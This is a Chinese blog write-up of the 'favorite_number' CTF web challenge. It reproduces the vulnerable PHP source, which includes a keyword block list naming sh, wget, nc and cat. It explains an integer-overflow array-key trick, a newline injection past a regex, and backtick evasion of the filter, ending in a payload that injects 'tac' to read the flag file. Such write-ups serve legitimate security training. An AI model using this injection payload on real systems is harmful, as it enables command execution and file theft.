CTF-webfavorite_number

时间：2020-12-04 11:46:24 阅读：24 评论：0 收藏：0 [点我收藏+]

CTF-webfavorite_number

题目链接
考点知识：PHP代码审计、PHP正则表达式、PHP整型溢出、linux系统命令

解题思路

1、题目源码解析

<?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = [‘admin‘, ‘user‘];
//要求POST提交的stuff强等于array，也就是类型与数值相等，且stuff[0]不等于admin
//PHP5.5.9整型溢出溢出漏洞，stuff[2^32]=stuff[0]
if($stuff === $array && $stuff[0] != ‘admin‘) {
    $num= $_POST["num"];
//利用url换行符%0a，第一行是数字绕过正则
    if (preg_match("/^\d+$/im",$num)){
//利用tac与反引号
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|‘|\"|\|/i",$num)){
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo ‘Bonjour!‘;
        }
    }
} else {
    highlight_file(__FILE__);
}

最终payload：

stuff[4294967296]=admin&stuff[1]=user&num=123%0atac+/fla``g

技术分享图片

CTF-webfavorite_number

原文：https://www.cnblogs.com/renhaoblog/p/14084257.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)